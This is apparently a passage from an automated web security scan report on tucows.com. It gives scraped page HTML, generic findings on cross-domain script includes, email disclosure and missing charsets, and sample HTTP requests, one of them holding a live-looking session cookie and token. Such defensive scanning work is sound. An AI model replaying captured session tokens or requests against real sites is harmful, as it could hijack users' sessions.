Blu-ray to a desktop computer we'll show you how to add Blu-ray to your notebook. <a href="http://www.butterscotch.com/tutorial/Adding-Blu-Ray-To-A-Notebook-Computer?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/tutorial/Adding-Blu-Ray-To-A-Notebook-Computer?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bluray1.jpg" height=84 width=84 alt="How do I - Use Blu-ray" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/tutorial/Bing-Photo-Search?src=splr"><strong> ...[SNIP]... <p> The Bing iPhone app makes it easy to find whatever photos you're interested in. We'll show you how in this episode. <a href="http://www.butterscotch.com/tutorial/Bing-Photo-Search?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/tutorial/Bing-Photo-Search?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bing1.jpg" height=84 width=84 alt="Top Secrets - Bing iPhone app" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/tutorial/Adding-Blu-Ray-To-Your-Desktop-Computer?src=splr"><strong> ...[SNIP]... <p> Here we show you how to add a Blu-ray drive to your desktop computer and tell you what you'll need in your system to make it work. <a href="http://www.butterscotch.com/tutorial/Adding-Blu-Ray-To-Your-Desktop-Computer?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/tutorial/Adding-Blu-Ray-To-Your-Desktop-Computer?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bluray1.jpg" height=84 width=84 alt="How do I - Use Blu-ray" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/tutorial/Finding-Flight-Information-On-Bing?src=splr"><strong> ...[SNIP]... <p> The Bing iPhone application makes it easy to find deals on flights from your local airport or check the status on a specific flight. <a href="http://www.butterscotch.com/tutorial/Finding-Flight-Information-On-Bing?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/tutorial/Finding-Flight-Information-On-Bing?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bing1.jpg" height=84 width=84 alt="Top Secrets - Bing iPhone app" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/tutorial/What-Is-Blu-Ray?src=splr"><strong> ...[SNIP]... <p> In our first episode of this series, we'll tell you what exactly Blu-ray is and what it is used for. <a href="http://www.butterscotch.com/tutorial/What-Is-Blu-Ray?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/tutorial/What-Is-Blu-Ray?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bluray1.jpg" height=84 width=84 alt="How do I - Use Blu-ray" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/tutorial/How-Do-I-Use-Blu-Ray-?src=splr"><strong> ...[SNIP]... <p> In this series we tell you what Blu-ray is and show you how to add Blu-ray drives to your computer and how to burn Blu-ray discs. <a href="http://www.butterscotch.com/tutorial/How-Do-I-Use-Blu-Ray-?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/tutorial/How-Do-I-Use-Blu-Ray-?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bluray1.jpg" height=84 width=84 alt="How do I - Use Blu-ray" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/tutorial/Customizing-Your-Bookmarks?src=splr"><strong> ...[SNIP]... <p> Here we show you how to customize the bookmarks that appear in your Bing iPhone application. <a href="http://www.butterscotch.com/tutorial/Customizing-Your-Bookmarks?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/tutorial/Customizing-Your-Bookmarks?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bing1.jpg" height=84 width=84 alt="Top Secrets - Bing iPhone app" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/tutorial/Shoot-And-Edit-Video-On-The-IPhone-4?src=splr"><strong> ...[SNIP]... rs runs through all the steps in shooting and editing together great videos using the cameras on the iPhone 4 from the first time you hit the record button to the finished, polished end product. <a href="http://www.butterscotch.com/tutorial/Shoot-And-Edit-Video-On-The-IPhone-4?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/tutorial/Shoot-And-Edit-Video-On-The-IPhone-4?src=splr"><img src="http://www-s.butterscotch.com/uplassets/iphone1.png" height=84 width=84 alt="How Do I Shoot video with the iPhone 4" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/show/Searching-And-Saving-Topics?src=splr"><strong> ...[SNIP]... <p> You can search for topics on Hootsuite much like you can on Twitter and you can save your searches for later reference. <a href="http://www.butterscotch.com/show/Searching-And-Saving-Topics?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/show/Searching-And-Saving-Topics?src=splr"><img src="http://www-s.butterscotch.com/uplassets/hootsuite1.jpg" height=84 width=84 alt="Hootsuite for iPhone" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/show/Ok-Go-Doing-Away-With-Big-Labels-And-Turning-To-Social-Media?src=splr"><strong> ...[SNIP]... its own entity and its own task master is indy in the purest sense. Rather than toiling away in obscurity though, the band has harnessed social media like no other, selling over 600,000 records. <a href="http://www.butterscotch.com/show/Ok-Go-Doing-Away-With-Big-Labels-And-Turning-To-Social-Media?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/show/Ok-Go-Doing-Away-With-Big-Labels-And-Turning-To-Social-Media?src=splr"><img src="http://www-s.butterscotch.com/uplassets/SU_Artwork_84x84.jpg" height=84 width=84 alt="Status Update" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/show/GV-Mobile-For-IPhone-Review?src=splr"><strong> ...[SNIP]... <p> We take a minute to show you GV Mobile+, an app that allows iPhone users to access Google Voice through their phone. <a href="http://www.butterscotch.com/show/GV-Mobile-For-IPhone-Review?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/show/GV-Mobile-For-IPhone-Review?src=splr"><img src="http://www-s.butterscotch.com/uplassets/60-sec-84.jpg" height=84 width=84 alt="60-Second App - Apple" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/show/Adding-Your-Twitter-Lists-To-Hootsuite?src=splr"><strong> ...[SNIP]... <p> If you use lists in your Twitter account then you'll be pleased to know that you can use them when you use Hootsuite as well. <a href="http://www.butterscotch.com/show/Adding-Your-Twitter-Lists-To-Hootsuite?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/show/Adding-Your-Twitter-Lists-To-Hootsuite?src=splr"><img src="http://www-s.butterscotch.com/uplassets/hootsuite1.jpg" height=84 width=84 alt="Hootsuite for iPhone" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/show/Convert-Video-To-IPad-Format-With-Amediasoft?src=splr"><strong> ...[SNIP]... <p> Amediasoft's iPad Video Converter does just what the name says: it converts video from just about any format you can throw at it into an iPad compatible file format. <a href="http://www.butterscotch.com/show/Convert-Video-To-IPad-Format-With-Amediasoft?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/show/Convert-Video-To-IPad-Format-With-Amediasoft?src=splr"><img src="http://www-s.butterscotch.com/uplassets/MsDownload_AlbumArt_84.jpg" height=84 width=84 alt="Miss Download" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/show/Lego-Creationary-For-IPad-Review-?src=splr"><strong> ...[SNIP]... <p> We review the Lego Creationary app for the iPad, the game that challenges you to guess what Lego structures are being built before they are completed. <a href="http://www.butterscotch.com/show/Lego-Creationary-For-IPad-Review-?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/show/Lego-Creationary-For-IPad-Review-?src=splr"><img src="http://www-s.butterscotch.com/uplassets/60-sec-84.jpg" height=84 width=84 alt="60-Second App - Apple" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/show/Organizing-Your-Streams?src=splr"><strong> ...[SNIP]... <p> With your social networking accounts added to Hootsuite, you'll next want to organize the components of each account into the order that is most comfortable for you to read. <a href="http://www.butterscotch.com/show/Organizing-Your-Streams?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/show/Organizing-Your-Streams?src=splr"><img src="http://www-s.butterscotch.com/uplassets/hootsuite1.jpg" height=84 width=84 alt="Hootsuite for iPhone" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/show/Robots-Robots-Robots-At-CES-2011?src=splr"><strong> ...[SNIP]... er Electronics Show in search of robots to do our bidding...with the help of Andrew Moore-Crispin and Kate Abraham, we find more cleaning robots , robots that will make things for us, robots tha <a href="http://www.butterscotch.com/show/Robots-Robots-Robots-At-CES-2011?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/show/Robots-Robots-Robots-At-CES-2011?src=splr"><img src="http://www-s.butterscotch.com/uplassets/labrats84.png" height=84 width=84 alt="Lab Rats" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/show/TyPad-Bluetooth-Keyboard-For-IPad-Video-Review?src=splr"><strong> ...[SNIP]... eyboards for Apple's iconic iPad abound. Some get it right, some get it very wrong and some fall in the middle ground. We take a look at one of the latter, the tyPad Bluetooth keyboard for iPad. <a href="http://www.butterscotch.com/show/TyPad-Bluetooth-Keyboard-For-IPad-Video-Review?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/show/TyPad-Bluetooth-Keyboard-For-IPad-Video-Review?src=splr"><img src="http://www-s.butterscotch.com/uplassets/TheSweetStuff_AlbumArt_yellow-84.png" height=84 width=84 alt="Gadget TV" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/show/Connecting-To-Your-Accounts?src=splr"><strong> ...[SNIP]... <p> In order to use Hootsuite properly you'll need to connect with your social networking accounts. We show you how to do that in this episode. <a href="http://www.butterscotch.com/show/Connecting-To-Your-Accounts?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/show/Connecting-To-Your-Accounts?src=splr"><img src="http://www-s.butterscotch.com/uplassets/hootsuite1.jpg" height=84 width=84 alt="Hootsuite for iPhone" /></a> ...[SNIP]... <div class="cartouchebottom"> <a href="http://www.butterscotch.com/">Browse more tasty tech >></a> ...[SNIP]... </a> | <a href="http://www.tucowsinc.com/careers/">Jobs</a> | <a href="http://www.tucowsinc.com/">Services</a> ...[SNIP]... </a> | <a href="http://www.butterscotch.com/">butterscotch.com </a> ...[SNIP]... <div class="footer_right"> <a href="http://www.flickr.com/search/?q=squishycow" target="_blank"><img style="border: none;" src="images/newassets/footer_logo.gif" height=53 width=56 alt="Cows" /> ...[SNIP]... <!-- Google Analytics Start --> <script src="http://www.google-analytics.com/urchin.js"></script> ...[SNIP]...
7. Cross-domain script includepreviousnext There are 31 instances of this issue:
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET /preview/194850/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
Request
GET /videoegg/ad.html HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmc=163973946; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utmb=163973946; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D